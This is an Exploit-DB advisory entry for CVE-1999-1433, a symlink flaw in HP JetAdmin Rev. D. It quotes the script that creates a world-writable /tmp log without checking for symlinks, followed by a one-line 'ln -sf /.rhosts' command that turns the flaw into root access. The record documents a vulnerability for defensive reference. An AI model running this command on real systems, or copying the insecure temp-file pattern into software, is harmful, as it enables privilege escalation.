HP JetAdmin 1.0.9 Rev. D - symlink

EDB-ID:

19124

CVE:

1999-1433

EDB Verified:

Author:

emffmmadffsdf

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

1998-07-15

Vulnerable App: 
source: https://www.securityfocus.com/bid/157/info

A vulnerability exists in HP's JetAdmin Rev. D.01.09 software. Due to its failure to check if it is following a symbolic link, it is possible for an attacker to create a link from /tmp/jetadmin.log to anywhere on the filesystem, with permissions for reading and writing by everyone on the system. This can be used to gain root access.

The problem lies in the checking and creation of the log file. The following snippit is from /opt/hpnp/admin/jetadmin.
----
LOG=$TMP/jetadmin.log

if [ ! -f "$LOG" ]
then
touch $LOG
chmod 666 $LOG
fi
----

If the log file does not exist, the jetadmin script will create it, and change its permissions to 666. It does not check if the file is a symbolic link.

ln -sf /.rhosts /tmp/jetadmin.log
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services